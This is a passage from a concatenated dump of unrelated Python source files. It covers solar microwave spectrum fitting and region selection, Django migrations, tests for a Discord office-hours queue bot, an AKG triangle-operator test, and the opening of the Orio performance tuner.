return mtb
if tb_err is None:
# return mTb - Tb
return mtb - tb
# wt = 1./flx_err
# wt = 1./(Tb_err/Tb/np.log(10.))
# residual = np.abs((logmTb - np.log10(Tb))) * wt
# residual = np.abs((mflx - flx)) * wt
residual = (mtb - tb) / tb_err
return residual
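# Minimal sketch (placeholder values, not recommendations from the original author) of the
# lmfit.Parameters object consumed by mwspec2min_1src:
#   params = lmfit.Parameters()
#   params.add('ssz', value=100., vary=False)            # source area [arcsec^2]
#   params.add('depth', value=10., vary=False)           # line-of-sight depth [arcsec]
#   params.add('Bmag', value=300., min=10., max=2000.)   # magnetic field [G]
#   params.add('Tth', value=10., min=1., max=50.)        # thermal temperature [MK]
#   params.add('nth', value=1., min=0.1, max=10.)        # thermal density [1e10 cm^-3]
#   params.add('lognrlh', value=7., min=3., max=10.)     # log10 nonthermal density > 0.1 MeV
#   params.add('delta', value=4., min=2., max=10.)       # power-law index
#   params.add('theta', value=45., min=5., max=85.)      # viewing angle [deg]
#   params.add('Emin', value=0.1, vary=False)            # low-energy cutoff [MeV]
#   params.add('Emax', value=10., vary=False)            # high-energy cutoff [MeV]
#   result = lmfit.minimize(mwspec2min_1src, params,
#                           kws=dict(freqghz=freqghz, tb=tb, tb_err=tb_err))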
class RegionSelector:
# def set_errorobj(self, xout, yout, errobj, yerr):
# eospec, dummy, (errbar_eospec,) = errobj
# eospec.set_data(xout, yout)
# if yerr is not None:
# yerr_top = yout + yerr
# yerr_bot = yout - yerr
# new_segments_y = [np.array([[x, yt], [x, yb]]) for x, yt, yb in zip(xout, yerr_top, yerr_bot)]
# errbar_eospec.set_segments(new_segments_y)
# return 1
def subdata(self, xs, ys, rfile):
rmap, rdata, rheader, ndim, npol_fits, stokaxis, rfreqs, rdelts = ndfits.read(rfile)
ny, nx = rmap.data.shape
tr_coord = rmap.top_right_coord
bl_coord = rmap.bottom_left_coord
x0 = bl_coord.Tx.to(u.arcsec).value
y0 = bl_coord.Ty.to(u.arcsec).value
x1 = tr_coord.Tx.to(u.arcsec).value
y1 = tr_coord.Ty.to(u.arcsec).value
dx = rmap.scale.axis1.to(u.arcsec / u.pix).value
dy = rmap.scale.axis2.to(u.arcsec / u.pix).value
mapx, mapy = np.linspace(x0, x1, nx) - dx / 2.0, np.linspace(y0, y1, ny) - dy / 2.0
xsmin = np.nanmin(xs)
xsmax = np.nanmax(xs)
ysmin = np.nanmin(ys)
ysmax = np.nanmax(ys)
if np.abs(xsmax - xsmin) < dx:
xsmax = xsmin + dx
if np.abs(ysmax - ysmin) < dy:
ysmax = ysmin + dy
xmask = np.logical_and(mapx >= xsmin, mapx <= xsmax)
nxnew = np.count_nonzero(xmask)
ymask = np.logical_and(mapy >= ysmin, mapy <= ysmax)
nynew = np.count_nonzero(ymask)
xmask = np.tile(xmask, ny).reshape(ny, nx)
ymask = np.tile(ymask, nx).reshape(nx, ny).transpose()
mask = xmask & ymask
# print(np.count_nonzero(mask))
self.npix = np.count_nonzero(mask)
self.area = self.npix * dx * dy
data = rdata[:, mask]
# print(rdata[:, :, mask])
# print(mask.shape, rdata.shape, data.shape)
data = np.squeeze(data)
# print(data.shape)
return data
def __init__(self, clkpnts, boxlines, eofiles, errobjs, cfreqs=None, rms=None, eofile_ref=None, errobj_ref=None,
wTmap=None, outspec_ff=None, scatter_gsfit=None,
get_peak=False, get_sum=False):
self.boxline = []
self.clkpnt = []
self.xs = list(clkpnts[0].get_xdata())
self.ys = list(clkpnts[0].get_ydata())
self.npix = None
self.area = None
self.xout = []
self.yout = []
self.xouterr = []
self.youterr = []
for errobj in errobjs:
eospec, dummy, (errbar_eospec,) = errobj
self.xout.append(eospec.get_xdata())
self.yout.append(eospec.get_ydata())
self.errobjs = errobjs
self.errobj_ref = errobj_ref
self.outspec_ff = outspec_ff
self.scatter_gsfit = scatter_gsfit
self.cfreqs = cfreqs
self.rms = rms
self.eofiles = eofiles
self.eofile_ref = eofile_ref
self.wTmap = wTmap
self.wT = None
self.em = None
self.get_peak = get_peak
self.get_sum = get_sum
self.tps = []
self.params = None
for idx, s in enumerate(clkpnts):
self.boxline.append(boxlines[idx])
self.clkpnt.append(s)
self.cid = s.figure.canvas.mpl_connect('button_press_event', self)
def __call__(self, event):
axes = [clkpnt.axes for clkpnt in self.clkpnt]
if self.clkpnt[0].figure.canvas.toolbar.mode == '':
if event.inaxes not in axes:
return
nxs = len(self.xs)
if event.button == 1:
if nxs < 2:
self.xs.append(event.xdata)
self.ys.append(event.ydata)
else:
self.xs = [event.xdata]
self.ys = [event.ydata]
elif event.button == 3:
if len(self.xs) > 0:
self.xs.pop()
self.ys.pop()
self.get_flux()
def get_flux(self):
if len(self.xs) > 0:
xs = np.array(self.xs, dtype=np.float64)
ys = np.array(self.ys, dtype=np.float64)
for clkpnt in self.clkpnt:
clkpnt.set_data(xs, ys)
else:
for clkpnt in self.clkpnt:
clkpnt.set_data([], [])
nxs = len(self.xs)
if nxs <= 1:
for line in self.boxline:
line.set_data([], [])
elif nxs == 2:
datas = []
# eofile = self.eofiles[0]
# rmap, rdata, rheader, ndim, npol_fits, stokaxis, rfreqs, rdelts = ndfits.read(eofile)
# data = self.subdata(xs, ys, eofile)
# datas.append(data)
for tidx, eofile in enumerate(self.eofiles):
data = self.subdata(xs, ys, eofile)
datas.append(data)
if self.eofile_ref is not None:
data_ref = self.subdata(xs, ys, self.eofile_ref)
if self.wTmap is not None:
datawT = self.subdata(xs, ys, self.wTmap)
if self.get_peak:
youts_outspec = []
for data in datas:
if data.ndim > 1:
youts_outspec.append(np.nanmax(data, axis=-1) / 1e6)
else:
youts_outspec.append(data / 1e6)
if self.eofile_ref is not None:
youts_outspec_ref = np.nanmax(data_ref[0, dd, :, :]) / 1e6
else:
youts_outspec = []
for data in datas:
if data.ndim > 1:
youts_outspec.append(np.nanmean(data, axis=-1) / 1e6)
else:
youts_outspec.append(data / 1e6)
if self.eofile_ref is not None:
if data.ndim > 1:
youts_outspec_ref = np.nanmean(data_ref, axis=-1) / 1e6
else:
youts_outspec_ref = data_ref / 1e6
self.tps = []
for data in datas:
if data.ndim > 1:
self.tps.append(np.nansum(data, axis=-1) / 1e6)
else:
self.tps.append(data / 1e6)
xout = self.cfreqs
for tidx, errobj in enumerate(self.errobjs):
set_errorobj(xout, youts_outspec[tidx], errobj, self.rms)
if self.eofile_ref is not None:
set_errorobj(xout, youts_outspec_ref, self.errobj_ref, self.rms)
if self.wTmap is not None:
print(datawT.shape)
wT = np.nanmean(datawT[..., 1]) * 1e6
em = np.nanmean(datawT[..., 0])
arcsec2cm = (self.wTmap[0].rsun_meters / self.wTmap[0].rsun_obs).to(u.cm / u.arcsec).value
# nele = 4.0e10
# depth = em / nele ** 2 / arcsec2cm
# print('Temperature: {:.1f} MK, EM: {:.2e} cm-5, depth: {:.1f} arcsec if nele is {:.2e} cm-3'.format(wT / 1e6, em, depth, nele))
depth = 20. ## arcsec
nele = np.sqrt(em / (depth * arcsec2cm))
print('Temperature: {:.1f} MK, EM: {:.2e} cm-5, nele: {:.2e} cm-3 if depth is {:.1f} arcsec'.format(
wT / 1e6, em, nele, depth))
self.wT = wT
self.em = em
yout_ff = np.array([ff_emission(em, T=wT, Z=1., mu=ll) for ll in xout * 1e9]) / 1.e6
self.outspec_ff.set_data(xout, yout_ff)
self.errobjs[0][0].figure.canvas.draw_idle()
for line in self.boxline:
line.set_data([xs[0], xs[1], xs[1], xs[0], xs[0]], [ys[0], ys[0], ys[1], ys[1], ys[0]])
clkpnt.figure.canvas.draw_idle()
class GStool:
# def get_showaia(self):
# return self._showaia
#
# def set_showaia(self, value):
# self._showaia = value
#
# showaia = property(fget=get_showaia, fset=set_showaia, doc="`Boolean`-like: Display AIA image or not")
def __init__(self, eofiles, aiafile=None, xycen=None, fov=None, freqghz_bound=[-1, 100], calpha=0.5,
clevels=np.array([0.3, 1.0]), opencontour=None):
self.aiafile = aiafile
self.eofiles = eofiles
self.xycen = xycen
self.fov = fov
self.calpha = calpha
self.clevels = clevels
self.freqghz_bound = freqghz_bound
self.opencontour = opencontour
self._showaia = False
rmap, rdata, rheader, ndim, npol_fits, stokaxis, rfreqs, rdelts = ndfits.read(eofiles[0])
self.bdinfo = bdinfo = ndfits.get_bdinfo(rfreqs, rdelts)
self.cfreqs = cfreqs = bdinfo['cfreqs']
self.cfreqs_all = cfreqs_all = bdinfo['cfreqs_all']
self.freq_dist = lambda fq: (fq - cfreqs_all[0]) / (cfreqs_all[-1] - cfreqs_all[0])
self.ntim = ntim = len(eofiles)
self.xlim = xlim = xycen[0] + np.array([-1, 1]) * 0.5 * fov[0]
self.ylim = ylim = xycen[1] + np.array([-1, 1]) * 0.5 * fov[1]
nspw = len(rfreqs)
eodate = Time(rmap.date.mjd + rmap.exposure_time.value / 2. / 24 / 3600, format='mjd')
ny, nx = rmap.data.shape
x0, x1 = (np.array([1, rmap.meta['NAXIS1']]) - rmap.meta['CRPIX1']) * rmap.meta['CDELT1'] + \
rmap.meta['CRVAL1']
y0, y1 = (np.array([1, rmap.meta['NAXIS2']]) - rmap.meta['CRPIX2']) * rmap.meta['CDELT2'] + \
rmap.meta['CRVAL2']
dx = rmap.meta['CDELT1']
dy = rmap.meta['CDELT2']
mapx, mapy = np.linspace(x0, x1, nx), np.linspace(y0, y1, ny)
fig = plt.figure(figsize=(15, 6))
self.fig = fig
grids = fig.add_gridspec(ncols=3, nrows=1, width_ratios=[1, 1, 0.6])
self.grids = grids
axs = []
axs.append(fig.add_subplot(grids[0, 0]))
axs.append(fig.add_subplot(grids[0, 1], sharex=axs[-1], sharey=axs[-1]))
axs.append(fig.add_subplot(grids[0, 2]))
if aiafile:
if os.path.exists(aiafile):
try:
aiacmap = plt.get_cmap('gray_r')
aiamap = smap.Map(aiafile)
ax = axs[0]
aiamap.plot(axes=ax, cmap=aiacmap)
ax = axs[1]
aiamap.plot(axes=ax, cmap=aiacmap)
self._showaia = True
except:
self._showaia = False
if self._showaia:
if self.opencontour is None:
self.opencontour = False
else:
if self.opencontour is None:
self.opencontour = True
## Plot EOVSA images as filled contour on top of the AIA image
icmap = plt.get_cmap('RdYlBu')
cts = []
## color map for spectra from the image series
tcmap = plt.get_cmap('turbo')
for s, sp in enumerate(rfreqs):
data = rdata[s, ...]
clvls = clevels * np.nanmax(data)
rcmap = [icmap(self.freq_dist(self.cfreqs[s]))] * len(clvls)
if self.opencontour:
cts.append(ax.contour(mapx, mapy, data, levels=clvls,
colors=rcmap,
alpha=calpha))
else:
cts.append(ax.contourf(mapx, mapy, data, levels=clvls,
colors=rcmap,
alpha=calpha))
ax.set_xlim(self.xlim)
ax.set_ylim(self.ylim)
for ax in axs[:2]:
ax.set_xlabel('Solar-X [arcsec]')
ax.set_ylabel('Solar-y [arcsec]')
ax.set_title('')
ax.text(0.02, 0.01,
' '.join(['AIA {:.0f} Å'.format(aiamap.wavelength.value),
aiamap.date.datetime.strftime('%Y-%m-%dT%H:%M:%S')]),
ha='left',
va='bottom',
color='k', transform=ax.transAxes)
ax.text(0.02, 0.05, ' '.join(['EOVSA ', eodate.datetime.strftime('%Y-%m-%dT%H:%M:%S')]), ha='left',
va='bottom',
color='k', transform=ax.transAxes)
divider = make_axes_locatable(axs[0])
cax = divider.append_axes("right", size="8%", pad=0.08)
cax.set_visible(False)
divider = make_axes_locatable(axs[1])
cax = divider.append_axes("right", size="8%", pad=0.08)
ticks, bounds, vmax, vmin, freqmask = ql.get_colorbar_params(bdinfo)
cb = colorbar.ColorbarBase(cax, norm=colors.Normalize(vmin=vmin, vmax=vmax), cmap=icmap,
orientation='vertical', boundaries=bounds, spacing='proportional',
ticks=ticks, format='%4.1f', alpha=calpha)
for fbd_lo, fbd_hi in freqmask:
if fbd_hi is not None:
cax.axhspan(fbd_lo, fbd_hi, hatch='//', edgecolor='k', facecolor='#BBBBBB')
plt.text(0.5, 1.05, 'MW', ha='center', va='bottom', transform=cax.transAxes, color='k', fontweight='normal')
plt.text(0.5, 1.01, '[GHz]', ha='center', va='bottom', transform=cax.transAxes, color='k',
fontweight='normal')
cax.xaxis.set_visible(False)
cax.tick_params(axis="y", pad=-20., length=0, colors='k', labelsize=7)
cax.axhline(vmin, xmin=1.0, xmax=1.2, color='k', clip_on=False)
cax.axhline(vmax, xmin=1.0, xmax=1.2, color='k', clip_on=False)
cax.text(1.25, 0.0, '{:.1f}'.format(vmin), fontsize=9, transform=cax.transAxes, va='center', ha='left')
cax.text(1.25, 1.0, '{:.1f}'.format(vmax), fontsize=9, transform=cax.transAxes, va='center', ha='left')
boxlines = []
clkpnts = []
for idx, ax in enumerate(axs[:2]):
if idx == 0:
c = 'g'
elif idx == 1:
c = 'b'
else:
c = 'k'
line, = ax.plot([], [], '-', c=c, alpha=1.0) # empty line
boxlines.append(line)
            clkpnt, = ax.plot([], [], '+', c='white', alpha=0.7)  # empty click-point marker
clkpnts.append(clkpnt)
if ntim < 2:
cplts = ['k']
else:
cplts = tcmap(np.linspace(0, 1, ntim))
self.cplts = cplts
self.ax_eospec = axs[-1]
errobjs = initspecplot(self.ax_eospec, cplts)
grids.tight_layout(fig)
self.region = RegionSelector(clkpnts, boxlines, eofiles, errobjs, cfreqs=cfreqs, rms=None, wTmap=None)
self.scatter_eospecs_fit = []
self.scatter_eospecs = []
def set_params(self, params):
ssz = self.region.area # source area in arcsec^2
        params.add('ssz', value=ssz, vary=False)  # source area in arcsec^2
self.params = params
def plot_components(self):
ti = 0
tb = self.region.errobjs[ti][0].get_ydata() * 1e6
tb_ma = ma.masked_less_equal(tb, 0)
freqghz = self.region.errobjs[0][0].get_xdata()
# freqghz_ma = ma.masked_outside(freqghz, 1.0, 15.0)
freqghz_ma = ma.masked_outside(freqghz, self.freqghz_bound[0], self.freqghz_bound[1])
mask_fit = np.logical_or(freqghz_ma.mask, tb_ma.mask)
freqghz_ma = ma.masked_array(freqghz, mask_fit)
tb_ma = ma.masked_array(tb, mask_fit)
# scatter_eospecs_fit.append(
# ax_spec.plot(freqghz_ma, tb_ma / 1.e6, marker='o', linestyle='', c=cplts[ti]))
# flx_rms = rms
tb_err = tb * 0.0
tb_err[:] = 1.e6
tb_err_ma = ma.masked_array(tb_err, tb_ma.mask)
if len(self.scatter_eospecs_fit) == 0:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs_fit.append(
self.ax_eospec.errorbar(freqghz_ma, tb_ma / 1.e6, yerr=tb_err_ma / 1.e6, marker='.', ms=1,
linestyle='',
c=cplt))
else:
for ti, cplt in enumerate(self.cplts):
set_errorobj(freqghz_ma, tb_ma / 1.e6, self.scatter_eospecs_fit[ti], yerr=tb_err_ma / 1.e6)
def fit(self):
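        """Fit the selected region's spectrum: mask non-positive brightness temperatures
        and frequencies outside `freqghz_bound`, assume a 10% Tb error, minimize
        `mwspec2min_1src` with lmfit (Nelder-Mead), then overplot the fitted spectrum
        on the spectral axis."""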
ti = 0
tb = self.region.errobjs[ti][0].get_ydata() * 1e6
tb_ma = ma.masked_less_equal(tb, 0)
freqghz = self.region.errobjs[0][0].get_xdata()
# freqghz_ma = ma.masked_outside(freqghz, 1.0, 15.0)
freqghz_ma = ma.masked_outside(freqghz, self.freqghz_bound[0], self.freqghz_bound[1])
mask_fit = np.logical_or(freqghz_ma.mask, tb_ma.mask)
freqghz_ma = ma.masked_array(freqghz, mask_fit)
tb_ma = ma.masked_array(tb, mask_fit)
# scatter_eospecs_fit.append(
# ax_spec.plot(freqghz_ma, tb_ma / 1.e6, marker='o', linestyle='', c=cplts[ti]))
# flx_rms = rms
tb_err = tb * 0.1
# tb_err[:] = 0.2e6
tb_err_ma = ma.masked_array(tb_err, tb_ma.mask)
if len(self.scatter_eospecs_fit) == 0:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs_fit.append(
self.ax_eospec.errorbar(freqghz_ma, tb_ma / 1.e6, yerr=tb_err_ma / 1.e6, marker='.', ms=1,
linestyle='', c=cplt))
else:
for ti, cplt in enumerate(self.cplts):
set_errorobj(freqghz_ma, tb_ma / 1.e6, self.scatter_eospecs_fit[ti], yerr=tb_err_ma / 1.e6)
mini = lmfit.Minimizer(mwspec2min_1src, self.params, fcn_args=(freqghz_ma.compressed(),),
fcn_kws={'tb': tb_ma.compressed(), 'tb_err': tb_err_ma.compressed()},
nan_policy='omit')
method = 'nelder'
# # method = 'differential_evolution'
mi = mini.minimize(method=method)
print(method + ' minimization results')
print(lmfit.fit_report(mi.params))
tb_fit = mwspec2min_1src(mi.params, freqghz)
if len(self.scatter_eospecs) == 0:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs.append(self.ax_eospec.plot(freqghz, tb_fit / 1.e6, linestyle='-', c=cplt))
else:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs[ti][0].set_data(freqghz, tb_fit / 1.e6)
| 1.671875 | 2 |
msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | 10 | 11356 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dimensions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('year', models.PositiveIntegerField(default=None, null=True, blank=True)),
('authors', models.CharField(default=None, max_length=250, blank=True)),
('link', models.CharField(default=None, max_length=250, blank=True)),
('title', models.CharField(default=None, max_length=250, blank=True)),
('venue', models.CharField(default=None, max_length=250, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField()),
('dimensions', models.ManyToManyField(to='dimensions.Dimension')),
('source', models.ForeignKey(default=None, to='questions.Article', null=True)),
],
options={
},
bases=(models.Model,),
),
]
| 1.820313 | 2 |
test/test_check_alert.py | russ-lewis/cs120-queuebot | 0 | 11357 | import io
import sys
import unittest
import asyncio
import random
from contextlib import redirect_stdout
from .utils import *
from queuebot import QueueBot, QueueConfig, DiscordUser
config = {
"SECRET_TOKEN": "<PASSWORD>",
"TA_ROLES": ["UGTA"],
"LISTEN_CHANNELS": ["join-queue"],
"CHECK_VOICE_WAITING": "False",
"VOICE_WAITING": "waiting-room",
"ALERT_ON_FIRST_JOIN": "True",
"VOICE_OFFICES": ["Office Hours Room 1", "Office Hours Room 2", "Office Hours Room 3"],
"ALERTS_CHANNEL": "queue-alerts",
}
config = QueueConfig(config, test_mode=True)
# TODO Comment each test case
class QueueTest(unittest.TestCase):
def setUp(self):
random.seed(SEED)
self.config = config.copy()
self.bot = QueueBot(self.config, None, testing=True)
# self.bot.waiting_room = MockVoice(config.VOICE_WAITING)
self.bot.logger = MockLogger()
self.bot.office_rooms = [MockVoice(name) for name in config.VOICE_OFFICES]
def reset_vc_queue(self):
# Reset queue
russ = get_rand_element(ALL_TAS)
message = MockMessage("!q clear", russ)
with io.StringIO() as buf, redirect_stdout(buf):
run(self.bot.queue_command(message))
self.assertEqual(len(self.bot._queue), 0)
# Empty voice channels
for v in self.bot.office_rooms:
v.members = []
def test_no_tas(self):
# No TAs in rooms
student = get_rand_element(ALL_STUDENTS)
self.assertEqual(len(self.bot._queue), 0)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
self.assertTrue(buf.getvalue().strip().startswith(
f"SEND: ✅ {student.get_mention()} you have been added at position #1"))
self.assertEqual(len(self.bot._queue), 1)
self.reset_vc_queue()
def test_one_ta(self):
ta = get_rand_element(ALL_TAS)
office_room = get_rand_element(self.bot.office_rooms)
office_room.members.append(ta)
student = get_rand_element(ALL_STUDENTS)
self.assertEqual(len(self.bot._queue), 0)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
self.assertTrue(buf.getvalue().strip().startswith(
f"SEND: {ta.get_mention()} The queue is no longer empty"))
self.assertEqual(len(self.bot._queue), 1)
self.reset_vc_queue()
def get_mentions_from_send(self, buf):
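        """Parse the mentioned TAs out of a captured alert line.
        Example (mention strings are illustrative): a captured line such as
        "SEND: <@111> <@222> The queue is no longer empty" returns
        ["<@111>", "<@222>"].
        """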
send_str = buf.getvalue().strip().split("\n", 1)[0]
assert send_str.startswith("SEND:")
assert "<@" in send_str
assert "The queue is no longer empty" in send_str
return send_str.lstrip("SEND: ") \
.rstrip(" The queue is no longer empty") \
.split(" ")
def test_many_tas_one_room(self):
tas = get_n_rand(ALL_TAS, 3)
office_room = get_rand_element(self.bot.office_rooms)
office_room.members.extend(tas)
mention_set = set()
student = get_rand_element(ALL_STUDENTS)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
mention_set.update(mentions)
for ta in tas:
self.assertTrue(ta.get_mention() in mention_set)
mention_set.remove(ta.get_mention())
self.assertEqual(len(mention_set), 0)
self.reset_vc_queue()
def test_many_tas_all_rooms(self):
tas = get_n_rand(ALL_TAS, 5)
tas_copy = tas.copy()
while len(tas) > 0:
for office_room in self.bot.office_rooms:
# If we run out of TAs while going through all the rooms
if len(tas) == 0:
break
office_room.add_member(tas.pop())
mention_set = set()
student = get_rand_element(ALL_STUDENTS)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
mention_set.update(mentions)
for ta in tas_copy:
self.assertTrue(ta.get_mention() in mention_set)
mention_set.remove(ta.get_mention())
self.assertEqual(len(mention_set), 0)
self.reset_vc_queue()
def test_ta_with_student(self):
busy_room, open_room = get_n_rand(self.bot.office_rooms, 2)
busy_ta, open_ta = get_n_rand(ALL_TAS, 2)
busy_student, open_student = get_n_rand(ALL_STUDENTS, 2)
busy_room.add_many_members(busy_ta, busy_student)
open_room.add_member(open_ta)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", busy_student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
self.assertEqual(mentions, [open_ta.get_mention()])
def test_ta_with_student2(self):
rooms = get_n_rand(self.bot.office_rooms, 3)
busy_rooms = rooms[:-1]
open_room = rooms[-1]
busy_ta, open_ta = get_n_rand(ALL_TAS, 2)
students = [ None ]
open_student = None
while open_student in students:
students = get_n_rand(ALL_STUDENTS, 5)
open_student = get_rand_element(ALL_STUDENTS)
busy_rooms[0].add_many_members(busy_ta, *students[:-2])
busy_rooms[1].add_many_members(busy_ta, *students[-2:])
open_room.add_member(open_ta)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", open_student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
self.assertEqual(mentions, [open_ta.get_mention()])
def test_two_tas(self):
tas = get_n_rand(ALL_TAS, 2)
rooms = get_n_rand(self.bot.office_rooms, 2)
rooms[0].add_member(tas[0])
rooms[1].add_member(tas[1])
students = get_n_rand(ALL_STUDENTS, 2)
# Check for both alerted
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", students[0])
run(self.bot.queue_command(message))
ta_list = set(self.get_mentions_from_send(buf))
for ta in tas:
ta_list.remove(ta.get_mention())
self.assertEqual(len(ta_list), 0)
# Remove first student from queue
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q next", tas[0])
run(self.bot.queue_command(message))
self.assertEqual(len(self.bot._queue), 0)
# First ta helps first student
rooms[0].add_member(students[0])
# Another student joins
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", students[1])
run(self.bot.queue_command(message))
ta_list = self.get_mentions_from_send(buf)
self.assertEqual(ta_list, [tas[1].get_mention()])
if __name__ == '__main__':
unittest.main()
| 2.390625 | 2 |
iam/__init__.py | dataday/aws-utilities-sdk | 0 | 11358 | """
.. module:: aws_utilities_cli.iam
:platform: OS X
:synopsis: Small collection of utilities that
use the Amazon Web Services (AWS) SDK
.. moduleauthor:: dataday
"""
__all__ = ['generate_identity', 'generate_policy']
| 1.109375 | 1 |
tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 0 | 11359 | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tests.common.tensorio import compare_tensor
from tests.common.test_op import triangle
from akg.utils import kernel_exec as utils
from tests.common.gen_random import random_gaussian
def triangle_execute(shape, const_value, lower, dtype, attrs):
support_type = ['float16', 'float32']
assert dtype in support_type
assert len(shape) <= 2
if attrs is None:
attrs = {'enable_pre_poly_loop_partition': False}
attrs['enable_pre_poly_loop_partition'] = False
attrs['enable_post_poly_loop_partition'] = False
attrs['enable_convert_if'] = True
attrs['enable_double_buffer'] = False
output_shape = shape
if len(shape) == 1:
output_shape = [shape[0], shape[0]]
input, bench_mark = gen_data(shape, output_shape, const_value, lower, dtype)
op_attrs = [const_value, lower]
mod = triangle_compile(shape, dtype, op_attrs, attrs)
source_code = mod.imported_modules[0].get_source()
output = np.full(output_shape, np.nan, dtype)
output = utils.mod_launch(mod, (input, output), expect=bench_mark)
# compare result
compare_result = compare_tensor(output, bench_mark, rtol=5e-3, equal_nan=True)
return input, output, bench_mark, compare_result
def triangle_compile(shape, dtype, op_attrs, attrs):
return utils.op_build_test(triangle.triangle, [shape], [dtype], op_attrs, kernel_name='triangle', attrs=attrs)
def gen_data(shape, output_shape, const_value, lower, dtype):
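    # Worked example (illustrative values): for shape=(3,), lower=True, const_value=0,
    # every row of bench_mark starts as a copy of `input` and the strict upper
    # triangle is overwritten, e.g. input=[a, b, c] gives
    #   [[a, 0, 0],
    #    [a, b, 0],
    #    [a, b, c]]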
input = random_gaussian(shape, miu=1, sigma=0.3).astype(dtype)
if len(shape) == 2:
bench_mark = input
else:
bench_mark = np.zeros(output_shape).astype(dtype)
for i in range(output_shape[0]):
bench_mark[i] = input
if lower:
for i in range(output_shape[0]):
bench_mark[i][i + 1:] = const_value
else:
for i in range(output_shape[0]):
bench_mark[i][:i] = const_value
return input, bench_mark
| 1.75 | 2 |
profiles/migrations/0018_auto_20180514_2106.py | brentfraser/geotabloid | 2 | 11360 | <reponame>brentfraser/geotabloid<gh_stars>1-10
# Generated by Django 2.0.3 on 2018-05-14 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0017_otherfiles_location'),
]
operations = [
migrations.AlterField(
model_name='project',
name='url',
field=models.FileField(upload_to='projects/'),
),
]
| 1.523438 | 2 |
orio/main/tuner/tuner.py | parsabee/Orio | 24 | 11361 | <reponame>parsabee/Orio
#
# The tuner class to initiate the empirical performance tuning process
#
import re, sys, os
from orio.main.util.globals import *
import orio.main.dyn_loader, orio.main.tspec.tspec, orio.main.tuner.ptest_codegen, orio.main.tuner.ptest_driver
#--------------------------------------------------
# the name of the module containing various search algorithms
SEARCH_MOD_NAME = 'orio.main.tuner.search'
#--------------------------------------------------
class PerfTuner:
'''
The empirical performance tuner.
This class is responsible for invoking the code generators of the annotation modules,
compiling the resulting code, and interfacing with the search interface to run the
tests and collect the results.
'''
#-------------------------------------------------
def __init__(self, odriver):
'''To instantiate an empirical performance tuner object'''
self.odriver = odriver
self.dloader = orio.main.dyn_loader.DynLoader()
self.num_params=0
self.num_configs=0
self.num_bin=0
self.num_int=0
self.tinfo = None
#-------------------------------------------------
def tune(self, module_body_code, line_no, cfrags):
'''
        Perform empirical performance tuning on the given annotated code, and return the best
        optimized code variant.
'''
# extract the tuning information specified from the given annotation
tinfo = self.__extractTuningInfo(module_body_code, line_no)
self.tinfo = tinfo
# determine if parallel search is required
use_parallel_search = tinfo.batch_cmd != None
# create a performance-testing code generator for each distinct problem size
ptcodegens = []
#timing_code = ''
for prob_size in self.__getProblemSizes(tinfo.iparam_params, tinfo.iparam_constraints):
if self.odriver.lang == 'c':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGen(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search, tinfo.validation_file)
elif self.odriver.lang == 'cuda':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGenCUDA(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search)
elif self.odriver.lang == 'opencl':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGenOpenCL(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search)
elif self.odriver.lang == 'fortran':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGenFortran(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search)
else:
err('main.tuner.tuner: unknown output language specified: %s' % self.odriver.lang)
ptcodegens.append(c)
# create the performance-testing driver
ptdriver = orio.main.tuner.ptest_driver.PerfTestDriver(self.tinfo, use_parallel_search,
self.odriver.lang,
c.getTimerCode(use_parallel_search))
# get the axis names and axis value ranges to represent the search space
axis_names, axis_val_ranges = self.__buildCoordSystem(tinfo.pparam_params, tinfo.cmdline_params)
info('%s' % axis_names)
